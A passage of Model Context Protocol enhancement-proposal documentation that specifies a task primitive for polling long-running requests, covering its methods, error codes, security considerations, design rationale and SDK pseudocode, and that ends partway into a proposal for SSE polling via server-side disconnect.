* `unknown`: A terminal fallback state for unexpected error conditions when the receiver cannot determine the actual task state
#### Task Metadata
When augmenting a request with task execution, the `modelcontextprotocol.io/task` key is included in `_meta`:
```json theme={null}
{
"modelcontextprotocol.io/task": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840",
"keepAlive": 60000
}
}
```
Fields:
* `taskId` (string, required): Client-generated unique identifier for the task
* `keepAlive` (number, optional): Requested duration in milliseconds to retain results after completion
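Putting this together, a requestor might assemble a task-augmented `tools/call` request as in this sketch (`randomUUID` from Node's `crypto` module generates the client-side task ID; the tool name and arguments are illustrative):
```typescript theme={null}
import { randomUUID } from "node:crypto";

// The request parameters are unchanged; only _meta carries the task information.
const taskId = randomUUID();
const request = {
  jsonrpc: "2.0",
  id: 2,
  method: "tools/call",
  params: {
    name: "analyze_dataset",
    arguments: { dataset: "large_file.csv" },
    _meta: {
      "modelcontextprotocol.io/task": {
        taskId, // Client-generated unique identifier
        keepAlive: 60000, // Requested retention in milliseconds (optional)
      },
    },
  },
};
```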
#### Task Creation Notification
When a receiver creates a task, it sends a `notifications/tasks/created` notification to signal that the task is ready for polling. The notification has empty params, with the task ID conveyed through the `modelcontextprotocol.io/related-task` metadata key:
```json theme={null}
{
"jsonrpc": "2.0",
"method": "notifications/tasks/created",
"params": {
"_meta": {
"modelcontextprotocol.io/related-task": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840"
}
}
}
}
```
This notification enables requestors to begin polling without encountering race conditions where the task might not yet exist on the receiver.
#### Task Get Request
The `tasks/get` request retrieves the current state of a task:
```typescript theme={null}
{
taskId: string; // The task identifier to query
}
```
#### Task Get Response
The `tasks/get` response includes:
```typescript theme={null}
{
taskId: string; // The task identifier
status: TaskStatus; // Current task state
keepAlive: number | null; // Actual retention duration in milliseconds, null for unlimited
pollFrequency?: number; // Suggested polling interval in milliseconds
error?: string; // Error message if status is "failed"
}
```
#### Task Result Request
The `tasks/result` request retrieves the result of a completed task:
```typescript theme={null}
{
taskId: string; // The task identifier to retrieve results for
}
```
#### Task Result Response
The `tasks/result` response returns the original result that would have been returned by the request:
```typescript theme={null}
{
// The structure matches the result type of the original request
// For example, a tools/call task would return CallToolResult structure
[key: string]: unknown;
}
```
The result structure depends on the original request type. The receiver returns the same result structure that would have been returned if the request had been executed without task augmentation.
#### Task List Request
The `tasks/list` request retrieves a list of tasks:
```typescript theme={null}
{
cursor?: string; // Optional cursor for pagination
}
```
#### Task List Response
The `tasks/list` response includes:
```typescript theme={null}
{
tasks: Array<{
taskId: string; // The task identifier
status: TaskStatus; // Current task state
keepAlive: number | null; // Retention duration in milliseconds, null for unlimited
pollFrequency?: number; // Suggested polling interval in milliseconds
error?: string; // Error message if status is "failed"
}>;
nextCursor?: string; // Cursor for next page, absent if no more results
}
```
#### Related Task Metadata
All requests, responses, and notifications associated with a task **MUST** include the `modelcontextprotocol.io/related-task` key in `_meta`:
```json theme={null}
{
"modelcontextprotocol.io/related-task": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840"
}
}
```
This associates messages with their originating task across the entire request lifecycle.
### 7. Error Handling
Tasks use two error reporting mechanisms:
1. **Protocol Errors**: Standard JSON-RPC errors for protocol-level issues
2. **Task Execution Errors**: Errors in the underlying request execution, reported through task status
#### 7.1. Protocol Errors
Receivers **MUST** return standard JSON-RPC errors for the following protocol error cases:
* Invalid or nonexistent `taskId` in `tasks/get`, `tasks/list`, or `tasks/result`: `-32602` (Invalid params)
* Invalid or nonexistent cursor in `tasks/list`: `-32602` (Invalid params)
* Request with a `taskId` that was already used for a different task (if the receiver validates task ID uniqueness): `-32602` (Invalid params)
* Attempting to retrieve result when task is not in `completed` status: `-32602` (Invalid params)
* Internal errors: `-32603` (Internal error)
Receivers **SHOULD** provide informative error messages to describe the cause of errors.
**Example: Task not found**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 70,
"error": {
"code": -32602,
"message": "Failed to retrieve task: Task not found"
}
}
```
**Example: Task expired**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 71,
"error": {
"code": -32602,
"message": "Failed to retrieve task: Task has expired"
}
}
```
> NOTE: Receivers are not obligated to retain task metadata indefinitely. It is compliant behavior for a receiver to return a "not-found" error if it has purged an expired task.
**Example: Result requested for incomplete task**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 72,
"error": {
"code": -32602,
"message": "Cannot retrieve result: Task status is 'working', not 'completed'"
}
}
```
**Example: Duplicate task ID (if receiver validates uniqueness)**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 73,
"error": {
"code": -32602,
"message": "Task ID already exists: 786512e2-9e0d-44bd-8f29-789f320fe840"
}
}
```
#### 7.2. Task Execution Errors
When the underlying request fails during execution, the task moves to the `failed` status. The `tasks/get` response **SHOULD** include an `error` field with details about the failure:
```typescript theme={null}
{
taskId: string;
status: "failed";
keepAlive: number | null;
pollFrequency?: number;
error?: string; // Description of what went wrong
}
```
**Example: Task with execution error**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 4,
"result": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840",
"status": "failed",
"keepAlive": 30000,
"error": "Tool execution failed: API rate limit exceeded"
}
}
```
For tasks that wrap requests with their own error semantics (like `tools/call` with `isError: true`), the task should still reach `completed` status, and the error information is conveyed through the result structure of the original request type.
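A requestor therefore has to check both layers when resolving a task-augmented tool call. A sketch, assuming hypothetical `getTask` and `getTaskResult` helpers:
```typescript theme={null}
declare function getTask(taskId: string): Promise<{ status: string; error?: string }>;
declare function getTaskResult(taskId: string): Promise<{ isError?: boolean; content?: unknown }>;

async function resolveToolTask(taskId: string) {
  const task = await getTask(taskId);
  // Layer 1: task execution errors are reported through task status.
  if (task.status === "failed") {
    throw new Error(`Task failed: ${task.error ?? "unknown error"}`);
  }
  if (task.status !== "completed") {
    throw new Error(`Result not available yet (status: ${task.status})`);
  }
  const result = await getTaskResult(taskId);
  // Layer 2: the tool's own error semantics travel inside the completed result.
  if (result.isError) {
    console.warn("Tool reported an error result", result.content);
  }
  return result;
}
```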
### 8. Security Considerations
#### 8.1. Task Isolation and Access Control
1. Receivers **SHOULD** scope task IDs to prevent unauthorized access:
1. Bind tasks to the session that created them (if sessions are supported)
2. Bind tasks to the authentication context (if authentication is used)
3. Reject `tasks/get`, `tasks/list`, or `tasks/result` requests for tasks from different sessions or auth contexts
2. Receivers that do not implement session or authentication binding **SHOULD** document this limitation clearly, as task results may be accessible to any requestor that can guess the task ID.
3. Receivers **SHOULD** implement rate limiting on:
1. Task creation to prevent resource exhaustion
2. Task status polling to prevent denial of service
3. Task result retrieval attempts
4. Task listing requests to prevent denial of service
#### 8.2. Resource Management
> WARNING: Task results may persist longer than the original request execution time. For sensitive operations, requestors should carefully consider the security implications of extended result retention and may want to retrieve results promptly and request shorter `keepAlive` durations.
1. Receivers **SHOULD**:
1. Enforce limits on concurrent tasks per requestor
2. Enforce maximum `keepAlive` durations to prevent indefinite resource retention
3. Clean up expired tasks promptly to free resources
2. Receivers **SHOULD**:
1. Document maximum supported `keepAlive` duration
2. Document maximum concurrent tasks per requestor
3. Implement monitoring and alerting for resource usage
#### 8.3. Audit and Logging
1. Receivers **SHOULD**:
1. Log task creation, completion, and retrieval events for audit purposes
2. Include session/auth context in logs when available
3. Monitor for suspicious patterns (e.g., many failed task lookups, excessive polling)
2. Requestors **SHOULD**:
1. Log task lifecycle events for debugging and audit purposes
2. Track task IDs and their associated operations
## Rationale
### Design Decision: Generic Task Primitive
The decision to implement tasks as a generic request augmentation mechanism (rather than tool-specific or method-specific) was made to maximize protocol simplicity and flexibility.
Tasks are designed to work with any request type in the MCP protocol, not just tool calls. This means that `resources/read`, `prompts/get`, `sampling/createMessage`, and any future request types can all be augmented with task metadata. This approach provides significant benefits over a tool-specific design.
From a protocol perspective, this design eliminates the need for separate task implementations per request type. Instead of defining different async patterns for tools versus resources versus prompts, a single set of task management methods (`tasks/get` and `tasks/result`) works uniformly across all request types. This uniformity reduces cognitive load for implementers and creates a consistent experience for applications using the protocol.
The generic design also provides implementation flexibility. Servers can choose which requests support task augmentation without requiring protocol changes or version negotiation. If a server doesn't support tasks for a particular request type, it simply ignores the task metadata and processes the request normally. This allows servers to add task support to requests incrementally, starting with high-value operations and expanding over time based on actual usage patterns.
Architecturally, tasks are treated as metadata rather than a separate execution model. They augment existing requests rather than replacing them. The original request/response flow remains intact—the request still gets a response eventually. Tasks simply provide an additional polling-based mechanism for result retrieval. This design ensures that related messages (such as elicitations during task execution) can be associated consistently via the `modelcontextprotocol.io/related-task` metadata key, regardless of the underlying request type.
### Design Decision: Metadata-Based Augmentation
Using `_meta` for task information rather than dedicated request parameters was chosen to maintain a clear separation of concerns between request semantics and execution tracking.
Task information is fundamentally orthogonal to request semantics. The task ID and keepAlive duration don't affect what the request does—they only affect how the result is retrieved and retained. A `tools/call` request performs the same operation whether or not it includes task metadata. The task metadata simply provides an alternative mechanism for accessing the result.
By placing task information in `_meta`, we create a clear architectural boundary between "what to execute" (request parameters) and "how to track execution" (task metadata). This boundary makes it easier for implementers to reason about the protocol. Request parameters define the operation being performed, while metadata provides orthogonal concerns like progress tracking, task management, and other execution-related information.
This approach also provides natural backward compatibility. Servers that don't support tasks can ignore the `_meta` content without breaking request processing. The request parameters remain valid and complete, so the operation can proceed normally. This means no protocol version negotiation is required—the new functionality is purely additive and non-disruptive.
SDKs can provide ergonomic abstractions over the task primitive while maintaining the separation of concerns, for example:
```typescript theme={null}
// === MCP SDK (Pseudocode based loosely on modelcontextprotocol/typescript-sdk) ===
/**
 * NEW: A request that resolves to a result, either directly or by polling a task.
 */
class PendingRequest {
  constructor(
    readonly protocol: Protocol,
    readonly response: Promise<Result>,
    readonly taskId?: string,
  ) {}
  /**
   * Waits for a result, calling onTaskStatus if provided and a task was created.
   */
  async result({ onTaskStatus }: { onTaskStatus?: (task: Task) => Promise<void> } = {}): Promise<Result> {
    if (!onTaskStatus || !this.taskId) {
      // No task listener or task ID provided, just block for the result
      return await this.response;
    }
    // Whichever is successful first (or a failure if all fail) is returned.
    return Promise.any([
      this.response, // Blocks for result
      (async () => {
        // Blocks for a notifications/tasks/created with the provided task ID
        await this.protocol.waitForTask(this.taskId);
        return await this.taskHandler(onTaskStatus);
      })(),
    ]);
  }
  /**
   * Encapsulates polling for a result, calling onTaskStatus after querying the task.
   */
  private async taskHandler(onTaskStatus: (task: Task) => Promise<void>): Promise<Result> {
    // Poll for completion
    let task: Task;
    do {
      task = await this.protocol.getTask(this.taskId);
      await onTaskStatus(task);
      await sleep(task.pollFrequency ?? DEFAULT_POLLING_INTERVAL);
    } while (!task.isTerminal());
    // Process result
    return await this.protocol.getTaskResult(this.taskId);
  }
}
/**
 * Simplified/partial client session implementation for illustration purposes.
 * Extends a base class it shares with the server.
 */
class Client extends Protocol {
  /**
   * Existing request method, but with most implementation refactored to beginCallTool
   */
  async callTool(
    params: CallToolRequest['params'],
    resultSchema: Schema,
    options?: TaskOptions,
  ) {
    // Existing request methods can be changed to reuse new methods exposed for
    // separating request/response flows.
    const request = await this.beginCallTool(params, resultSchema, options);
    return request.result();
  }
  /**
   * NEW: Low-level method that starts a tool call and returns a PendingRequest
   * object for more granular control.
   */
  async beginCallTool(
    params: CallToolRequest['params'],
    resultSchema: Schema,
    options?: TaskOptions,
  ) {
    const request = await this.beginRequest({ method: 'tools/call', params }, resultSchema, options);
    return request;
  }
}
// === HOST APPLICATION ===
// Begin a tool call with task support
const pending: PendingRequest = await client.beginCallTool(
  {
    name: "analyze_dataset",
    arguments: { dataset: "large_file.csv" },
  },
  CallToolResultSchema,
  {
    keepAlive: 3600000,
  },
);
// Client code can assume tasks are supported, and the fallback case can be handled internally
const result = await pending.result({
  onTaskStatus: async (task) => {
    await sendLatestStateSomewhere(task);
  },
});
```
As the design does not alter the basic request semantics, the existing form would continue to work as well:
```typescript theme={null}
const result = await client.callTool(
{
name: "analyze_dataset",
arguments: { dataset: "large_file.csv" },
},
CallToolResultSchema,
);
```
### Design Decision: Client-Generated Task IDs
The choice to have clients generate task IDs rather than having servers assign them provides several critical benefits:
**Idempotency and Fault Tolerance:**
The primary benefit is enabling idempotent task creation. When a client generates the task ID, it can safely retry a task-augmented request if it doesn't receive a response, knowing that the server will recognize the duplicate task ID and return an error. This is essential for reliable operation over unreliable networks:
* If a request times out, the client can safely retry without creating duplicate tasks
* If a connection drops before the response arrives, the client can reconnect and retry
* The server validates task ID uniqueness and returns an error for duplicates, confirming whether the task was created
With server-generated task IDs, a timeout or connection failure creates uncertainty—the client doesn't know whether the task was created, and has no safe way to retry without potentially creating duplicate tasks.
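A retry loop built on this property might look like the following sketch; the `callToolWithTask` helper and the duplicate-ID error check (keyed off the `-32602` code from section 7.1) are illustrative:
```typescript theme={null}
declare function callToolWithTask(taskId: string, params: object): Promise<unknown>;

// Retry a task-augmented request with the SAME client-generated task ID.
// A duplicate-ID error on retry proves the task was created by an earlier
// attempt whose response was lost, so the requestor can proceed to polling.
async function createTaskWithRetry(taskId: string, params: object, attempts = 3): Promise<void> {
  for (let i = 0; i < attempts; i++) {
    try {
      await callToolWithTask(taskId, params);
      return; // Request accepted; poll tasks/get from here.
    } catch (err: any) {
      if (err?.code === -32602 && /already exists/i.test(err?.message ?? "")) {
        return; // Task already exists from a prior attempt; safe to poll.
      }
      if (i === attempts - 1) throw err; // Out of retries for transient failures.
    }
  }
}
```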
**Simplicity for Clients:**
Client-generated task IDs simplify the client's implementation by eliminating the need to correlate the initial response with a task identifier. The client can immediately begin polling for task status using the task ID it generated, without needing to parse the response to extract a server-assigned identifier. This is particularly valuable for asynchronous programming models where the client may want to store the task ID before the response arrives.
**Trade-offs for Servers:**
The main trade-off is that servers wrapping existing workflow systems with their own task identifiers will generally handle this by maintaining a mapping between the client-provided task IDs and the underlying system's identifiers. For example, an MCP server wrapping AWS Step Functions might receive a client-generated task ID like `"client-abc-123"` and need to track that it corresponds to Step Functions execution ARN `"arn:aws:states:...:exec-xyz"`.
This requires:
* Persistent storage for the task ID mapping (typically a simple key-value store)
* Maintaining the mapping for the task's keepAlive duration
* Handling mapping lookups for task status and result retrieval
However, this complexity is typically minor compared to the overall work of integrating an existing workflow system into MCP. Most workflow systems already require state management for tracking execution, and maintaining a task ID mapping is a straightforward addition. The mapping structure is simple (a client task ID maps to an internal identifier) and can be implemented using existing databases or key-value stores that such a server likely already uses for other state management.
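For illustration, such a mapping might look like the following sketch (the in-memory `Map` stands in for whatever durable store the server already uses; the Step Functions ARN is the example from above):
```typescript theme={null}
// In production this would be a durable key-value store, not an in-memory Map.
const taskMapping = new Map<string, string>();

// On task creation: remember which external execution backs the client task ID.
function recordExecution(clientTaskId: string, executionArn: string): void {
  taskMapping.set(clientTaskId, executionArn);
}

// On tasks/get or tasks/result: translate the client task ID back to the
// external identifier before querying the workflow system.
function lookupExecution(clientTaskId: string): string {
  const executionArn = taskMapping.get(clientTaskId);
  if (executionArn === undefined) {
    throw new Error("Task not found"); // Surfaces as a -32602 protocol error.
  }
  return executionArn;
}
```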
### Design Decision: Task Creation Notification
The decision to use a `notifications/tasks/created` notification rather than altering the response semantics (as #1391 proposed) acknowledges the asynchronous nature of task creation and enables efficient race patterns between task-based polling and traditional request/response flows.
When a server creates a task, it must signal to the client that the task is ready for polling. There are at least two possible approaches: (1) the initial request could return synchronously with task metadata, or (2) the server could send a notification. This proposal uses notifications for several key reasons:
1. Notifications enable fire-and-forget request processing. The server can accept the request, begin processing it, and send the notification once the task is created, without needing to block the initial request/response cycle. This is particularly important for servers that dispatch work to background systems or queues—they can acknowledge the request immediately and send the notification once the background system confirms task creation.
2. Notifications support the race pattern that enables graceful degradation. Clients can race between waiting for the original request's response and waiting for the `notifications/tasks/created` notification. If the server doesn't support tasks, no notification arrives and the original response wins. If the server does support tasks, the notification typically arrives first (or approximately simultaneously), enabling polling to begin. A synchronous response would force clients to wait for the response before knowing whether to poll or not.
3. Notifications avoid ambiguity with existing protocol semantics. If the initial request response included task metadata and the client then polled for results, it would change the implied meaning of existing notification types:
1. **Progress notifications**: The current MCP specification requires that progress notifications reference tokens that "are associated with an in-progress operation." While "operation" is not formally defined, the implied understanding is that an operation is bounded by a request/response pair—progress notifications stop when the response is sent. With a synchronous response containing task metadata, progress notifications would need to continue while the task executes, expanding the implied meaning of "operation" to include asynchronous tasks that outlive the original request/response cycle. The notification-based approach avoids this semantic expansion by keeping progress notifications tied to the initial request's lifecycle, while future task-based progress can be cleanly associated via `modelcontextprotocol.io/related-task` metadata. We recommend that a future SEP clarify the definition of "operation" in the progress specification.
2. **Cancellation semantics**: With the notification-based approach, `notifications/cancelled` clearly targets the original request ID and causes the associated task to move to `cancelled` status, maintaining a clean separation between request cancellation and task lifecycle management.
While the notification is required by the specification for servers that create tasks, there are edge cases where it may be unavailable:
* **sHTTP without stream support**: In environments where either the client or the server does not support SSE streams, notifications cannot be delivered. In such cases, clients may choose to proactively poll with `tasks/get` using exponential backoff, though this is nonstandard and may result in unnecessary polling attempts if the server doesn't support tasks.
* **Degraded connection scenarios**: If the notification is lost in transit, clients should implement reasonable timeout behavior and fall back to the original response.
The standard and recommended approach is to wait for the `notifications/tasks/created` notification before beginning polling. Proactive polling without waiting for the notification should be considered a fallback mechanism for constrained environments only.
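For completeness, a fallback poller for such constrained environments might back off exponentially while waiting for the task to appear. This sketch (with a hypothetical `getTask` helper) is nonstandard behavior, per the caveat above:
```typescript theme={null}
declare function getTask(taskId: string): Promise<{ status: string }>;
const sleep = (ms: number) => new Promise<void>((resolve) => setTimeout(resolve, ms));

// Fallback only: poll proactively when notifications cannot be delivered.
// A persistent "not found" likely means the receiver does not support tasks.
async function waitForTask(taskId: string, deadlineMs = 60_000) {
  const deadline = Date.now() + deadlineMs;
  let delay = 500;
  while (Date.now() < deadline) {
    try {
      return await getTask(taskId);
    } catch {
      await sleep(delay);
      delay = Math.min(delay * 2, 30_000); // Exponential backoff, capped.
    }
  }
  return null; // Give up and rely on the original request's response.
}
```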
### Design Decision: No Capabilities Declaration
Unlike other protocol features such as tools, resources, and prompts, tasks do not require capability negotiation. This decision was made to enable graceful degradation and per-request flexibility.
Task support can be determined implicitly through usage rather than explicitly through capability declarations. When a client sends a task-augmented request, the server will process it according to its capabilities. If the server doesn't support tasks for that request type, it simply ignores the task metadata and returns the result normally through the original request/response flow. The client can then detect the lack of task support by attempting to call `tasks/get` and handling any errors that result.
This approach eliminates the need for complex handshakes or feature detection protocols. Clients can optimistically try task augmentation and gracefully fall back to direct response handling if needed. This makes the protocol more resilient and easier to implement.
Additionally, this design provides per-request flexibility that would be difficult to express through capabilities. A server might support tasks on some request types but not others, or support might vary based on runtime conditions such as resource availability or load. Requiring granular capability declarations per request type would significantly complicate the protocol without providing substantial benefits. The implicit detection model is simpler and more flexible.
### Alternative Designs Considered
**Tool-Specific Async Execution:**
An earlier version of this proposal (#1391) focused specifically on tool calls, introducing an `invocationMode` field on tool definitions to mark tools as supporting synchronous, asynchronous, or both execution modes. This approach would have added dedicated fields to the tool call request and response structures, with server-side capability declarations to indicate support for async tool execution.
While this design would have addressed the immediate need for long-running tool calls, it was rejected in favor of the more general task primitive for several reasons. First, it artificially limited the async execution pattern to tools when other request types have similar needs. Resources can be expensive to read, prompts can require complex processing, and sampling requests may involve lengthy user interactions. Creating separate async patterns for each request type would lead to protocol fragmentation and inconsistent implementation patterns.
Second, the tool-specific approach required more complex capability negotiation and version handling. Servers would need to filter tool lists based on client capabilities, and SDKs would need to manage different invocation patterns for sync versus async tools. This complexity would ripple through every layer of the implementation stack.
Finally, the tool-specific design didn't address the broader architectural need for deferred result retrieval across all MCP request types. By generalizing to a task primitive that augments any request, this proposal provides a consistent pattern that can be applied uniformly across the protocol. More importantly, this foundation is extensible to future protocol messages and features such as subtasks, making it a more appropriate building block for the protocol's evolution.
**Transport-Layer Solutions:**
An alternative approach would be to solve for this purely at the transport layer, without introducing a new data-layer primitive. Several proposals (#1335, #1442, #1597) address transport-specific concerns such as connection resilience, request retry semantics, and stream management for sHTTP. These are valuable improvements that can mitigate many scaling and reliability challenges associated with requests that may take extended time to complete.
However, transport-layer solutions alone are insufficient for the use cases this SEP addresses. Even with perfect transport-layer reliability, several data-layer concerns remain:
First, servers and clients need a way to communicate expectations about execution patterns. Without this, host applications cannot make informed decisions about UX patterns—should they block, show a spinner, or allow the user to continue working? An annotation alone could signal that a request might take extended time, but provides no mechanism to actively check status or retrieve results later.
Second, transport-layer solutions cannot provide visibility into the execution state of a request that is still in progress. If a request stops sending progress notifications, the client cannot distinguish between "the server is doing expensive work" and "the request was lost." Transport-level retries can confirm the connection is alive, but cannot answer "is this specific request still executing?" This visibility is critical for operations where users need confidence their work is progressing.
Third, different transports would require different mechanisms for these concerns. The sHTTP proposals adjust stream management and retry semantics to fulfill these requirements, but stdio has no equivalent extension points. This creates transport-specific fragmentation where implementers must solve the same problems differently depending on their choice of transport. Data-layer operations provide consistent semantics across all transports.
Finally, deferred result retrieval and active status checks are data-layer concerns that cannot be addressed by transport improvements alone. The ability to retrieve a result multiple times, specify retention duration, and handle cleanup is orthogonal to how the underlying messages are delivered.
**Resource-Based Approaches:**
Another possible approach would be to leverage existing MCP resources for tracking long-running operations. For example, a tool could return a linked resource that communicates operation status, and clients could subscribe to that resource to receive updates when the operation completes. This would allow servers to represent task state using the resource primitive, potentially with annotations for suggested polling frequency.
While this approach is technically feasible and servers remain free to adopt such conventions, it suffers from similar limitations as the tool-splitting pattern described in the Motivation section. Like the `start_tool` and `get_tool` convention, a resource-based tracking system would be convention-based rather than standardized, creating several challenges:
The most fundamental issue is the lack of a consistent way for clients to distinguish between ordinary resources (meant to be exposed to models) and status-tracking resources (meant to be polled by the application). Should a status resource be presented to the model? How should the client correlate a returned resource with the original tool call? Without standardization, different servers would implement different conventions, forcing clients/hosts/models to handle each server's particular approach. Extending resources with task-like semantics (such as polling frequency, keepalive durations, and explicit status states) would create a new and distinct purpose for resources that would be difficult to distinguish from their existing purpose as model-accessible content.
The resource subscription model has one additional issue: as it is push-based, it requires clients to wait for notifications of resource changes rather than actively polling for status. While this works for some use cases, it doesn't address scenarios where clients need to actively check status—for example, proactively and deterministically checking if work is still progressing, which is the original intent of this proposal.
The task primitive addresses these concerns by providing a standardized, protocol-level mechanism specifically designed for this use case, with consistent semantics that any client can leverage without host applications needing to understand server-specific conventions. While resource-based tracking remains possible for servers that prefer it and/or are already using it, this SEP provides a first-class alternative that solves the broader set of requirements identified previously.
### Backward Compatibility
This SEP introduces **no backward incompatibilities**. All existing MCP functionality remains unchanged:
**Compatibility Guarantees:**
* Existing requests work identically with or without task metadata
* Servers that don't understand tasks process requests normally
* No protocol version negotiation required
* No capability declarations needed
**Graceful Degradation:**
* Clients race between waiting for the original request's response and waiting for the `notifications/tasks/created` notification followed by polling
* Whichever completes first (original response or task-based retrieval) is used by the client
* If a server doesn't support tasks, no `notifications/tasks/created` is sent, and the original request's response is used
* If a server supports tasks, the `notifications/tasks/created` notification is sent, enabling the client to begin polling for results
* This race pattern ensures graceful degradation without requiring capability negotiation or version detection
* Partial support is possible—servers can support tasks on some requests but not others
**Adoption Path:**
* Servers can implement task support incrementally, starting with high-value request types
* Clients can opportunistically use tasks where supported
* No coordination required between client and server updates
## Future Work
The task primitive introduced in this SEP provides a foundation for several important extensions that will enhance MCP's workflow capabilities.
### Push Notifications
While this SEP focuses on client-driven polling, future work could introduce server-initiated notifications for task state changes. This would be particularly valuable for operations that take hours or longer, where continuous polling becomes impractical.
A notification-based approach would allow servers to proactively inform clients when:
* A task completes or fails
* A task reaches a milestone or significant state transition
* A task requires input (complementing the `input_required` status)
This could be implemented through webhook-style mechanisms or persistent notification channels, depending on the transport capabilities. The proposed task ID and status model provides the necessary infrastructure for servers to identify which tasks warrant notifications and for clients to correlate notifications with their outstanding tasks.
### Intermediate Results
The current task model returns results only upon completion. Future extensions could enable tasks to report intermediate results or progress artifacts during execution. This would support use cases where servers can produce partial outputs before final completion, such as:
* Streaming analysis results as they become available
* Reporting completed phases of multi-step operations
* Providing preview data while full processing continues
Intermediate results would build on the proposed task ID association mechanism, allowing servers to send multiple result notifications or response messages tied to the same task ID throughout its lifecycle.
### Nested Task Execution
A significant future enhancement is support for hierarchical task relationships, where a task can spawn subtasks as part of its execution. This would enable complex, multi-step workflows orchestrated by the server.
In a nested task model, a server could:
* Create subtasks in response to a parent task reaching a state that requires additional operations
* Communicate subtask requirements to the client, potentially including required tool calls or sampling requests
* Track subtask completion and use subtask results to advance the parent task
* Maintain provenance through task ID hierarchies, showing the relationship between parent and child tasks
For example, a complex analysis task might spawn several subtasks for data gathering, each represented by its own task ID but associated with the parent task. The parent task would remain in a pending state (potentially in a new `tool_required` status) until all required subtasks complete.
This hierarchical model would support sophisticated server-controlled workflows while maintaining the client's ability to monitor and retrieve results at any level of the task tree.
Example nested task flow
```mermaid theme={null}
sequenceDiagram
participant C as Client
participant S as Server
Note over C,S: Client Creates Parent Task
C->>S: tools/call "deploy_application" _meta: {taskId: "deploy-123"}
S--)C: notifications/tasks/created
C->>S: tasks/get (taskId: "deploy-123")
S->>C: status: working
Note over S: Server determines subtasks needed
Note over C,S: Server Responds with Subtask Requirements
C->>S: tasks/get (taskId: "deploy-123")
S->>C: status: working childTasks: [{ taskId: "build-456", toolName: "run_build", arguments: {...} }, { taskId: "test-789", toolName: "run_tests", arguments: {...} }]
Note over C: Client initiates subtasks
C->>S: tools/call "run_build" _meta: {taskId: "build-456", parentTaskId: "deploy-123"}
S--)C: notifications/tasks/created
C->>S: tools/call "run_tests" _meta: {taskId: "test-789", parentTaskId: "deploy-123"}
S--)C: notifications/tasks/created
Note over C: Client polls subtasks
C->>S: tasks/get (taskId: "build-456")
S->>C: status: completed
C->>S: tasks/get (taskId: "test-789")
S->>C: status: completed
Note over S: All subtasks complete, parent continues
C->>S: tasks/get (taskId: "deploy-123")
S->>C: status: completed
C->>S: tasks/result (taskId: "deploy-123")
S->>C: Deployment complete
```
**Potential Data Model Extensions:**
The task status response could be extended to include parent and child task relationships:
```typescript theme={null}
{
taskId: string;
status: TaskStatus;
keepAlive: number | null;
pollFrequency?: number;
error?: string;
// Extensions for nested tasks
parentTaskId?: string; // ID of parent task, if this is a subtask
childTasks?: Array<{ // Subtasks required by this task
taskId: string; // Pre-generated task ID for the subtask
toolName: string; // Tool to call for this subtask
arguments?: object; // Arguments for the tool call
}>;
}
```
This would allow clients to:
* Discover subtasks required by a parent task through the `childTasks` array
* Initiate the required subtask tool calls using the pre-generated task IDs and provided arguments
* Navigate the task hierarchy by following parent/child relationships via `parentTaskId`
* Monitor all subtasks by polling each child task ID
* Wait for all subtasks to complete before checking parent task completion
The existing task metadata and status lifecycle are designed to be forward-compatible with these extensions.
# SEP-1699: Support SSE polling via server-side disconnect
Source: https://modelcontextprotocol.io/community/seps/1699-support-sse-polling-via-server-side-disconnect
Support SSE polling via server-side disconnect
| Field | Value |
| ------------- | ------------------------------------------------------------------------------- |
| **SEP** | 1699 |
| **Title** | Support SSE polling via server-side disconnect |
| **Status** | Final |
| **Type** | Standards Track |
| **Created** | 2025-10-22 |
| **Author(s)** | Jonathan Hefner ([@jonathanhefner](https://github.com/jonathanhefner)) |
| **Sponsor** | None |
| **PR** | [#1699](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1699) |
***
## Abstract
This SEP proposes changes to the Streamable HTTP transport in order to mitigate issues regarding long-running connections and resumability.
## Motivation
The Streamable HTTP transport spec [does not allow](https://github.com/modelcontextprotocol/modelcontextprotocol/blob/04c6e1f0ea6544c7df307fb2d7c637efe34f58d3/docs/specification/draft/basic/transports.mdx?plain=1#L109-L111) servers to close a connection while computing a result. In other words, barring client-side disconnection, servers must maintain potentially long-running connections.
## Specification
When a server starts an SSE stream, it MUST immediately send an SSE event consisting of an [`id`](https://html.spec.whatwg.org/multipage/server-sent-events.html#:~:text=field%20name%20is%20%22id%22) and an empty [`data`](https://html.spec.whatwg.org/multipage/server-sent-events.html#:~:text=field%20name%20is%20%22data%22) string in order to prime the client to reconnect with that event ID as the `Last-Event-ID`.
Note that the SSE standard explicitly [permits setting `data` to an empty string](https://html.spec.whatwg.org/multipage/server-sent-events.html#:~:text=data%20buffer%20is%20an%20empty%20string), and says that the appropriate client-side handling is to record the `id` for `Last-Event-ID` but otherwise ignore the event (i.e., not call the event handler callback).
At any point after the server has sent an event ID to the client, the server MAY disconnect at will. Specifically, [this part of the MCP spec](https://github.com/modelcontextprotocol/modelcontextprotocol/blob/04c6e1f0ea6544c7df307fb2d7c637efe34f58d3/docs/specification/draft/basic/transports.mdx?plain=1#L109-L111) will be changed from:
> The server **SHOULD NOT** close the SSE stream before sending the JSON-RPC *response* for the received JSON-RPC *request*
To:
> The server **MAY** close the connection before sending the JSON-RPC *response* if it has sent an SSE event with an event ID to the client
If a server disconnects, the client will interpret the disconnection the same as a network failure, and will attempt to reconnect. In order to prevent clients from reconnecting / polling excessively, the server SHOULD send an SSE event with a [`retry`](https://html.spec.whatwg.org/multipage/server-sent-events.html#:~:text=field%20name%20is%20%22retry%22) field indicating how long the client should wait before reconnecting. Clients MUST respect the `retry` field.
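A minimal Node server sketch of this flow; the route handling, event ID scheme, and five-second retry value are illustrative rather than mandated:
```typescript theme={null}
import { createServer } from "node:http";
import { randomUUID } from "node:crypto";

createServer((req, res) => {
  res.writeHead(200, { "Content-Type": "text/event-stream" });
  // Prime the client immediately: an event ID plus an empty data string.
  // Clients record the ID for Last-Event-ID but do not invoke event handlers.
  res.write(`id: ${randomUUID()}\ndata: \n\n`);
  // Tell the client how long to wait before reconnecting (milliseconds).
  res.write("retry: 5000\n\n");
  // Having sent an event ID, the server may now disconnect at will; the
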